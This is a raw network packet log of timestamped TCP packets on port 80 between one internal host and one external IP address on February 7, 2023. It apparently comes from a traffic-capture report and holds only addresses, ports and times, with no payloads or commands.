Feb 7, 2023 20:02:06.652679920 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652698040 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652714968 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652733088 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652750015 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652766943 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652784109 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652801037 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652807951 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.652817965 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652834892 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.652998924 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.652998924 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.653096914 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.653135061 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.653161049 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.653193951 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.653230906 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.653264999 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.653301001 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.653321028 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.653338909 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.653374910 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.653413057 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.653506994 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.653678894 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.653678894 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.663923979 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.688328981 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.688484907 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.688584089 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.688585043 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.688642979 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.688697100 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.688750982 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.688803911 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.688858032 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.688872099 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.688910961 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.688965082 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689018011 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689042091 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.689043045 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.689073086 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689127922 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689179897 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689205885 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.689234972 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689287901 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689342976 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689377069 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.689377069 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.689399004 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689454079 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689507008 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689559937 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689562082 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.689614058 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689667940 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689721107 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689721107 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.689775944 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689830065 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689882994 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689897060 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.689935923 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.689990044 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.690042019 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.690062046 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.690095901 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.690150023 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.690201998 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.690232038 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.690258026 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.690313101 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.690366030 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.690402985 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.690402985 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.690419912 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.690510988 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.690577030 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.690577984 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.690601110 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.690702915 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.690741062 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.690808058 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.690888882 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.690897942 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.690998077 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.691099882 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.691200018 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.691225052 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.691225052 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.691298962 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.691394091 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.691412926 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.691515923 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.691562891 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.691627026 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.691740990 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.691904068 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.712990999 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.713283062 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.725495100 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.725598097 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.725657940 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.725713015 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.725769043 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.725858927 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.725956917 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.725989103 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.725989103 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.726051092 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.726150990 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.726162910 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.726214886 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.726278067 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.726317883 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.726371050 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.726447105 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.726464033 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.726667881 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.726687908 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.726751089 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.726805925 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.726861954 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.726914883 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.726969004 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.726998091 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.727022886 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.727099895 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.727163076 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.727194071 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.727266073 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.727286100 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.727353096 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.727451086 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.727456093 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.727513075 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.727567911 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.727622986 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.727623940 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.727711916 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.727794886 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.727807045 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.727910995 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.728013039 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.728018045 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.728085041 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.728143930 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.728180885 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.728204012 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.728265047 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.728324890 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.728400946 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.728504896 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.728528023 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.728604078 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.728687048 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.728704929 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.728811979 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.728861094 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.728909969 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.729015112 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.729029894 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.729116917 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.729202032 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.729213953 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.729317904 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.729384899 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.729439974 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.729494095 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.729496002 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.729496002 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.729549885 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.729835033 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.729835033 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.734541893 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.763015032 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.763092041 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.763149977 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.763204098 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.763257980 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.763273001 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.763317108 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.763375998 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.763432026 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.763436079 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.763489962 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.763547897 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.763559103 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.763605118 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.763662100 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.763716936 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.763772011 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.763786077 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.763828993 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.763884068 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.763938904 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.763947964 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.763947964 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.763993025 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.764048100 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.764101028 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.764122963 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.764156103 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.764209986 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.764262915 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.764280081 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.764362097 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.764457941 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.764457941 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.764457941 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.764549971 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.764620066 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.764636993 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.764719009 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.764774084 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.764795065 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.764828920 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.764883041 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.764935970 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.764966011 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.764990091 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.765044928 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.765098095 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.765130997 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.765130997 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.765151978 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.765206099 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.765259981 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.765299082 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.765315056 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.765368938 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.765422106 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.765467882 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.765475035 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.765527964 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.765580893 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.765615940 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.765615940 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.765615940 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.765635014 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.765687943 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.765741110 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.765784025 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.765794039 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.765849113 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.765903950 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.765961885 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.766119957 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.766290903 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.787096024 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.787430048 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.799866915 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.799946070 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.800004959 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.800061941 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.800116062 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.800169945 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.800225019 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.800280094 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.800295115 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.800296068 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.800400019 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.800465107 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.800513983 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.800520897 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.800579071 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.800628901 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.800633907 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.800689936 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.800744057 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.800797939 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.800798893 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.800852060 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.800906897 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.800961018 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.800970078 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.800970078 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.801014900 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.801070929 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.801125050 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.801137924 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.801203966 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.801259041 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.801314116 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.801362991 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.801368952 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.801424980 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.801511049 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.801533937 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.801534891 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.801594973 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.801692009 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.801704884 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.801789999 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.801877975 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.801892996 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.801958084 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.802012920 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.802041054 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.802067995 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.802159071 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.802211046 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.802256107 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.802330017 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.802330017 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.802361965 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.802474022 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.802582979 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.802666903 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.802681923 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.802746058 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.802800894 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.802839994 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.802855968 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.802911043 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.802963972 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.803018093 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.803034067 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.803071976 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.803127050 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.803204060 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.803204060 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.803217888 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.803325891 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.803370953 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.803427935 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.803492069 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.803544998 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.803571939 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.803601980 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.803657055 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.803709984 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.803715944 CET	49801	80	192.168.11.20	87.236.146.31
Feb 7, 2023 20:02:06.803766966 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.803819895 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.803873062 CET	80	49801	87.236.146.31	192.168.11.20
Feb 7, 2023 20:02:06.803889990 CET	49801	80	192.168.11.20	87.236.146.31
